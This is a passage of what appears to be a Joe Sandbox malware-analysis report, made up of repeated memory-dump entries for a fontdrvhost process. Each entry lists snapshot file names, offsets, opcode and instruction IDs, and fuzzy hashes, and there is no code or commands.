                • Instruction Fuzzy Hash: 5902A330E1E68E8FEBA4EBA888656FD7BF1FF15300F4101BAD418D71A2DE7865448B51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b29a5b66149d4e6ff631ec1bb85571cb4e6484f6ca29c57a9053c6a95994f2f7
                • Instruction ID: a6909d0163f6a7eae1649868954416104fb4ab74d5f93647de12e09eeafb414d
                • Opcode Fuzzy Hash: b29a5b66149d4e6ff631ec1bb85571cb4e6484f6ca29c57a9053c6a95994f2f7
                • Instruction Fuzzy Hash: F702E731A0E68E4FE7A5DF6488292F97BE1FF19310F0501BEE458C61F2DE7865448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7cb179069512ac26caf7f7c2034e3db0a8bd825cd818818e1017eec683290020
                • Instruction ID: 28a29b0b9dbf1a87e391672073f520e223aecc55afefbfa4eac9b267a7c0c930
                • Opcode Fuzzy Hash: 7cb179069512ac26caf7f7c2034e3db0a8bd825cd818818e1017eec683290020
                • Instruction Fuzzy Hash: D4119431A0E68E4FE752EB6488695AA7BF1EF16300F0544B7D058C71B3DA74A5048751
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3974b72c8998f0266efe208148b86b63c11676f9b1f85adfbef586f92abf84b1
                • Instruction ID: 3f13e42c2667f11524eb4b828009a9c8005b5fc0ebc40140cd48c2ebda73b879
                • Opcode Fuzzy Hash: 3974b72c8998f0266efe208148b86b63c11676f9b1f85adfbef586f92abf84b1
                • Instruction Fuzzy Hash: 06E1F631A0E68E4FE7A59F6488692F97BE1FF19310F0501BEE858C60F3DE6866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ec386a8cedeef4321929e595ce18c54b202129f357856e598ed64acd06f6d148
                • Instruction ID: 59bedc10c066b3ec44e0ecd38d86dff523f48197015ab9edd1183fed5b917b24
                • Opcode Fuzzy Hash: ec386a8cedeef4321929e595ce18c54b202129f357856e598ed64acd06f6d148
                • Instruction Fuzzy Hash: 09E16D71E19A5D8FDB68EF98C4647ACB7B1FF58300F4041BAD04DD72A2CA746980DB40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e892a6378c77f5f1f5ebf49a9433943c89ef905b8b8a934d25d65398668947f
                • Instruction ID: 14705e0297f9fcacaf87399e5c9901a7f6a6d16a9ac7a9273ed184a6642feff8
                • Opcode Fuzzy Hash: 3e892a6378c77f5f1f5ebf49a9433943c89ef905b8b8a934d25d65398668947f
                • Instruction Fuzzy Hash: 76D1F631A0E68E4FE7A59F6488792F97BE1FF19310F0501BEE458C60F3EE6866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 110fc1a1f73c95691b39a883000cd1e6cf3d1d9d17052cc7834a43b45add3d07
                • Instruction ID: 60d3d8ed0858dedbc7dedc5dd862258ffaf7189f1692528d294a83edda11ca1c
                • Opcode Fuzzy Hash: 110fc1a1f73c95691b39a883000cd1e6cf3d1d9d17052cc7834a43b45add3d07
                • Instruction Fuzzy Hash: 71A1A631A0E68E4FE752EB7488695FA7FF1FF06310F0644B7D448C70A2DA68AA44C761
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1b9ccd500a27f049596ba755eca8fc72b59b2f90da4cd268898c0fcd4a5e7da2
                • Instruction ID: b4381a1bfb5dba95ecc7e8086d8f69e25125b46984ba45366dae9db05474b7ea
                • Opcode Fuzzy Hash: 1b9ccd500a27f049596ba755eca8fc72b59b2f90da4cd268898c0fcd4a5e7da2
                • Instruction Fuzzy Hash: D2A18130E19A4D8FDBA4EBA8C8656BDBBE1FF58300F41007AD40DD71A2DA75A944CB51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6cd95f8552eb13d85c50d70618273cc50054901bccf599de45b4784c80fe6920
                • Instruction ID: b4c9a57c7c12c2d1fb98a7c42a48e914282abb6263abaca06f8b3356587c18e9
                • Opcode Fuzzy Hash: 6cd95f8552eb13d85c50d70618273cc50054901bccf599de45b4784c80fe6920
                • Instruction Fuzzy Hash: 97A1E531A0E68E4FE7A59B6488792F97BE1FF19314F0501BEE848C60F3EE6865448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e00a1098f28891ee86854d3adab343ebe367ad46b5673716c3915ff8c848b9e6
                • Instruction ID: 212938577c69ffe07a41cc91680be6c0ab99eb960d0037c1aef9ad73088cda51
                • Opcode Fuzzy Hash: e00a1098f28891ee86854d3adab343ebe367ad46b5673716c3915ff8c848b9e6
                • Instruction Fuzzy Hash: 9E81DF31B1DA4D4FEB58DF5C88615A977E2EFE8300B15417AE45EC32A6DE74AD02C780
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c46f5d2fdff6e6d6e8e22a2a80a943975b0ac166c71881735176d70fb09323ef
                • Instruction ID: a21c42c41366486b4a6e2f5d3d99c5a1d50c160c5056484c52815beaef0137c4
                • Opcode Fuzzy Hash: c46f5d2fdff6e6d6e8e22a2a80a943975b0ac166c71881735176d70fb09323ef
                • Instruction Fuzzy Hash: 5381F231A0E68E4FE7A59B6448392F97BE1FF15310F4541BEE84CC60F3EEA866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68787867b63e3cecf3d08130edbfdeba513a6d94785133a1c7ae7909b53c6c6b
                • Instruction ID: 03b8effb54423cd534e7560731d2f1e682dc70be8ad77182234f3f383b39c3bd
                • Opcode Fuzzy Hash: 68787867b63e3cecf3d08130edbfdeba513a6d94785133a1c7ae7909b53c6c6b
                • Instruction Fuzzy Hash: 4881D130A1A78D8FDB59EBA4C8656FD7BB1FF19301F0501BAE409D71E2CA78A940CB51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43bb0d206febe7b9f5229fae79acd6b266d10550f0fca59150ecdb896113d63a
                • Instruction ID: 94f8801a840602fe72f58eb7c8348e796cbbf8f9b023e7bf380bf529088ea746
                • Opcode Fuzzy Hash: 43bb0d206febe7b9f5229fae79acd6b266d10550f0fca59150ecdb896113d63a
                • Instruction Fuzzy Hash: 1681F231A0E68E4FE7A59B6448392F97BE1FF15314F0541BEE84CC60F3EEA866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34b98f0d636735ce53d7ea00e6a16a3b483d76d856d0eec3e65b8fd93c5bba0d
                • Instruction ID: b8c0fab5c83931a89da4052491c4a055681fbc2a86470c8b5ff8b46fa5c528f8
                • Opcode Fuzzy Hash: 34b98f0d636735ce53d7ea00e6a16a3b483d76d856d0eec3e65b8fd93c5bba0d
                • Instruction Fuzzy Hash: F671A030E0A64D8FEB64DF94C8646FE7BF2EF59300F11417AD009D62A6DA786A448B90
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cd72f67cddeb2ed1f9bf9693535079fad7c6e3e20093ae2ba64fb4a09af6ff5
                • Instruction ID: 1b8be2fba6bc23809ccc688b1b06c429549e2b28e851367bfec655dc568bd8e9
                • Opcode Fuzzy Hash: 8cd72f67cddeb2ed1f9bf9693535079fad7c6e3e20093ae2ba64fb4a09af6ff5
                • Instruction Fuzzy Hash: D561E431A0E68E4FE7A59B6448392F97AE1FF15314F0541BEE84CC60F3EE6866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8bec7c9790931dc98c79e5ded0bbcbf0043e5df07656e7c9dd5c632d12b174b8
                • Instruction ID: 728ddbe6fffb5322367d9562bbe3b2937f3bc7840d1ee6c80460ce7a4e8eb5fd
                • Opcode Fuzzy Hash: 8bec7c9790931dc98c79e5ded0bbcbf0043e5df07656e7c9dd5c632d12b174b8
                • Instruction Fuzzy Hash: C9616C30E09A5D8FEB64EBA8C8656EDB7F1FF59300F51017AD00DD32A2DE786A419B44
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75cd08e8d71847e21aba834fa4e6edd04d9b3bb48afa5c3bd3a8b58f210cb8fe
                • Instruction ID: c824deb4d5c2d057edaa1767b1dfbfd55a6090d4ea33298c685dc2915d8f9293
                • Opcode Fuzzy Hash: 75cd08e8d71847e21aba834fa4e6edd04d9b3bb48afa5c3bd3a8b58f210cb8fe
                • Instruction Fuzzy Hash: 6E51DD31B18B4D4FDB58DF4888A45BA77E2FFE8310B15467EE45AC7296DE74A8028780
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ab9e7e283fc26b8d1e3d4188259949f7de6901c104d97a272586da71387eb32
                • Instruction ID: 278bd0db963b5fd012ffe347229b0930073bfd3d5636a67af7e5e7b14792252e
                • Opcode Fuzzy Hash: 5ab9e7e283fc26b8d1e3d4188259949f7de6901c104d97a272586da71387eb32
                • Instruction Fuzzy Hash: C9616130E0A65E8FEBA49B6888657B97BB1FF05300F0141BAD45DD31A2DF786A84CF51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1417ac8e6918bbeaa9d13c521762544cf346bfa8b36125f1a5aee94cde50230
                • Instruction ID: 7f3225ed6edb960a16e81d75644ac75d56f811a3a4b3accb4c9fac1456a53fe6
                • Opcode Fuzzy Hash: e1417ac8e6918bbeaa9d13c521762544cf346bfa8b36125f1a5aee94cde50230
                • Instruction Fuzzy Hash: 5F51E731A0E68E8FEBA59F6488392F97BE1FF15314F0501BEE45CC60F2DE6866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9235efd1d8c34c42a5ee5ca2407162494da88ce98ee65029c641e3775a4ec48b
                • Instruction ID: 33cb732403856575332a09eb06236adcb3a9e52a3b3ce3aeb69e167b5c59e765
                • Opcode Fuzzy Hash: 9235efd1d8c34c42a5ee5ca2407162494da88ce98ee65029c641e3775a4ec48b
                • Instruction Fuzzy Hash: 5151DF30A0E64E8FEBA9EB6488656B97BA1FF18300F0145BEE41DC60B2DE7966448751
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a606b86825b2c77fe3afb244aa2748f2e1b62af6f573c501420477d051ed0d58
                • Instruction ID: 3f6e83d5c315ce7bb11dbcfaf7c15c68deb30c8e9d671cddb6d528fa31966a51
                • Opcode Fuzzy Hash: a606b86825b2c77fe3afb244aa2748f2e1b62af6f573c501420477d051ed0d58
                • Instruction Fuzzy Hash: 3C515B71E0A60E8FEB68DB98C4A46EDBBF1EF58311F514079D009E72A1DB786A44DB40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ccf8b151f2f1aab486692200dfe12ebeeb30e75d84027dd4eac75ec03fcf0117
                • Instruction ID: 35ff79edcbc1c8457ae3a909ee56d39fffabd24bc8df1b346d30c46c0ee3c2f1
                • Opcode Fuzzy Hash: ccf8b151f2f1aab486692200dfe12ebeeb30e75d84027dd4eac75ec03fcf0117
                • Instruction Fuzzy Hash: EB512E70E19A1D8FDFA4EB98D865BADB7F2FF58301F40007AD00DE3292DA7569818B54
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c1fe95710f9bcca28adaaeaa44c2385dfd92b6d334381890d71700c3e021eebb
                • Instruction ID: 67e81fdfbb25c3d16a09e7fd8debbc330b0a42216536df076675493255b3dbe3
                • Opcode Fuzzy Hash: c1fe95710f9bcca28adaaeaa44c2385dfd92b6d334381890d71700c3e021eebb
                • Instruction Fuzzy Hash: 86519030E0964E8FEB61EBE8C9686ED7BF1FF09300F01457AD019D71A6DA78A654CB10
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cdeef6a4dab06ce5c17ee5f9993c35a50273c960545f241063aee42cb7f14bd7
                • Instruction ID: e2ba12486e6e0da6511fd8d263bcee375b79aa01a9f8cd6d0bf8adbdae0711ed
                • Opcode Fuzzy Hash: cdeef6a4dab06ce5c17ee5f9993c35a50273c960545f241063aee42cb7f14bd7
                • Instruction Fuzzy Hash: 41412675F0A91E8FE761EBA8C8695E877E0FF55300F0549B7C018C70A2EE74AA09C381
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9bafb6797cac42deee08754304ba54fba48eab10c6a69a1dfad686aac2907824
                • Instruction ID: b38a0fa4d65bf49dd7f18f20825a1dfc2956528789b97038a1228776126d2e92
                • Opcode Fuzzy Hash: 9bafb6797cac42deee08754304ba54fba48eab10c6a69a1dfad686aac2907824
                • Instruction Fuzzy Hash: B9414931B0E78E0FE769D7B888655B97BE0EF86310B0545FBE44CC71E6DE68A9418341
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 30695e0c509df1fb34e1004b40e19281bb01c7ab9521665d2d4fecc0aefae153
                • Instruction ID: 13f4a229a887d307d5d7912978060819ea2c1dabd6174b92fde3ba7de789aa26
                • Opcode Fuzzy Hash: 30695e0c509df1fb34e1004b40e19281bb01c7ab9521665d2d4fecc0aefae153
                • Instruction Fuzzy Hash: 9841F931A1E68E4FEB759F6848351BD7AE1FF15310F0500BED858C60E2DE645548CB51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b7d80f43a2d00c215de5ef1e26f9826db33fd93b7a78df08dd348bf699d3cdba
                • Instruction ID: e65b5cf72a8b972d0f52b40910e138589cda4c6ba9534e7b97911be9a85f978d
                • Opcode Fuzzy Hash: b7d80f43a2d00c215de5ef1e26f9826db33fd93b7a78df08dd348bf699d3cdba
                • Instruction Fuzzy Hash: 1941F731A0E68E8FEBA59F6488352F97BE1FF15314F0501BEE45CC60F2DEA866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd10c20517a051278aadc87ee6a7f83eb7466d7123ead33777db40b44d3aa124
                • Instruction ID: 0484e6b0b47fb3ef056799dc2050cf92c2b3ab823994fd0af8ef1c87288bdd0e
                • Opcode Fuzzy Hash: fd10c20517a051278aadc87ee6a7f83eb7466d7123ead33777db40b44d3aa124
                • Instruction Fuzzy Hash: 7951B970E15A1D8FDBA4EB98C8557ACB7B1FF58300F4041A9901DE3292DF746A84CF01
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a16dd4f45bec0ee3959b29f98503c8a40908ecc60337462707b2f60197f37ae
                • Instruction ID: b984b2f832f17bab9208c93914c40e641bc1b0dae62272cabd7abfffe4692bba
                • Opcode Fuzzy Hash: 5a16dd4f45bec0ee3959b29f98503c8a40908ecc60337462707b2f60197f37ae
                • Instruction Fuzzy Hash: 2531A030E1A64E5EEBA9EBA8C4686BA77E0FF29304F11057ED01ED21E5DE6566408640
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8a83a54de4b98c00c0c27018b27552308aa11802d1b3806853277b78ba4ca6a
                • Instruction ID: 6cfd3a023343133fa4953c036ac446643ddcf3918de1b09e0cc5acbe106bc0ea
                • Opcode Fuzzy Hash: e8a83a54de4b98c00c0c27018b27552308aa11802d1b3806853277b78ba4ca6a
                • Instruction Fuzzy Hash: E321FF3094E3C94FD716ABB088755E57FB0AF17200F0A45EFD48ACB4E3CA696656C362
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3276ab9c94ec2465ca1dd421d6b771d3a2ed356b8e5354fad686e79de7f9b74c
                • Instruction ID: e6b976eebea0be580cb6f24bb302c89f1ecb69de53e09ac6a7f1710fe3bed375
                • Opcode Fuzzy Hash: 3276ab9c94ec2465ca1dd421d6b771d3a2ed356b8e5354fad686e79de7f9b74c
                • Instruction Fuzzy Hash: D8215C31E0A62D8FEB64EB44C890BE9B3B1FF5D310F5142A6C00DD62A5CB349A85CF41
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1db7da003136c3e92063c9698bff214d577f69181e5d9075162a2d164aaffa76
                • Instruction ID: 91d0ca49bddfdf7ad40b1bf768e29c45ca1e43d54fcf75133bfc88cf363dad72
                • Opcode Fuzzy Hash: 1db7da003136c3e92063c9698bff214d577f69181e5d9075162a2d164aaffa76
                • Instruction Fuzzy Hash: 75110431E0950E4FEBA4EBA888991FD7BE0FF18740F4245B6D41CC70B6EE74A6409740
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c5009ec993ef8cdba211d9b1f14774dcdaf10ec8c530e9058987ca4f7f48097
                • Instruction ID: e2df80e70547c035ea11f1aa85c05eb6af8d26ac6319d235f3202ac77ed17dc3
                • Opcode Fuzzy Hash: 9c5009ec993ef8cdba211d9b1f14774dcdaf10ec8c530e9058987ca4f7f48097
                • Instruction Fuzzy Hash: F321A370E0562D8FDF64DF94D894AECB7F1FF58311F41012AE409E6291DBB86944DB40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4be9237830d7d09b36ae256c63779c03f24221ae654599947dd1ea05f8eecc0e
                • Instruction ID: fa60c1543c11605206b2bca89aa5c831249a83427abd96ddf5ba221af5807e05
                • Opcode Fuzzy Hash: 4be9237830d7d09b36ae256c63779c03f24221ae654599947dd1ea05f8eecc0e
                • Instruction Fuzzy Hash: EA118230A0954E8FEB58EF64C4A82BD7BE0FF18301F4104BAD41DC61A1DE75A640CB00
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 97e109658e7ec79da38512112a29829c6c78b6840dbf3921ce7523fcbd69419c
                • Instruction ID: 596961adb78011b201093ad50dfc49180e3e01ba1f4d25108ff2ede6b37a20db
                • Opcode Fuzzy Hash: 97e109658e7ec79da38512112a29829c6c78b6840dbf3921ce7523fcbd69419c
                • Instruction Fuzzy Hash: 2C118230A09A4E4FDB55EB6888695FD7BB0FF19304F0504BBD41DCB0A2EE785640C751
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 199076248859bcfdf74f5e01c72a71e45e52d247cf59c309e8d959b4514d939a
                • Instruction ID: 3b33d8b6fb2f460f60c8db460ecaa5eb97bd7d36cd80c89ad276b50e58e1a90a
                • Opcode Fuzzy Hash: 199076248859bcfdf74f5e01c72a71e45e52d247cf59c309e8d959b4514d939a
                • Instruction Fuzzy Hash: 43118E30A09A4E9FEB98EF64C4692BD7BE0FF18305F0104BAD419C21A2EE79A640C700
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 63ff9377696e2e538599685af2a320e59dfec05f329cdde64f959b6c5daa35ab
                • Instruction ID: 7fdb87dc3d4479f28dcfd1697f02537f652264cce08fd1dca89df650bf2a70da
                • Opcode Fuzzy Hash: 63ff9377696e2e538599685af2a320e59dfec05f329cdde64f959b6c5daa35ab
                • Instruction Fuzzy Hash: F2113C70A0A68E8FDB58EF6884696B97BF0FF18304F4104BED419C61A1DA75A6409700
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa19e3b9b604b914cad2257349c239fe7d63cbdeadb7ecac565e7c86174d6a41
                • Instruction ID: 42962a8b1d1bfdf3fb4adfcd40232afe69808370acda5b7b187bd73b0915c117
                • Opcode Fuzzy Hash: aa19e3b9b604b914cad2257349c239fe7d63cbdeadb7ecac565e7c86174d6a41
